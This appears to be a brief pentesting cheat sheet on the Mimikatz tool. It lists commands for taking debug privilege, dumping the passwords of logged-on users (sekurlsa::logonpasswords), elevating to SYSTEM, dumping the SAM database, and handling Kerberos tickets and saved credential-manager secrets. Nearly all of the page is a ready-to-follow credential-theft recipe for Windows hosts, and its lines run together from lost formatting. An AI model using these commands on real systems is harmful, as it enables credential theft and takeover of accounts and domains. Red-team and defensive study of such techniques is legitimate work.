Mimikatz
A little tool to play with Windows security GitHub - gentilkiwi/mimikatz
Passwords & SAM
Launch mimikatz (as Administrator!)
mimikatz.exeEngage SeDebugPrivilege
privilege::debug-> OK
Whoami
token::whoamiDump creds of all logged-on users
sekurlsa::logonpasswords(Optional) Impersonate to nt authority\system
token::elevateDump sam database
lsadump::samTickets
Show tickets
Export tickets
Credential manager saved credentials
howto ~ credential manager saved credentials · gentilkiwi/mimikatz Wiki · GitHub
Locally?
From DC?
-> Look for "[domainkey]", decrypt using same command with /rpc
Last updated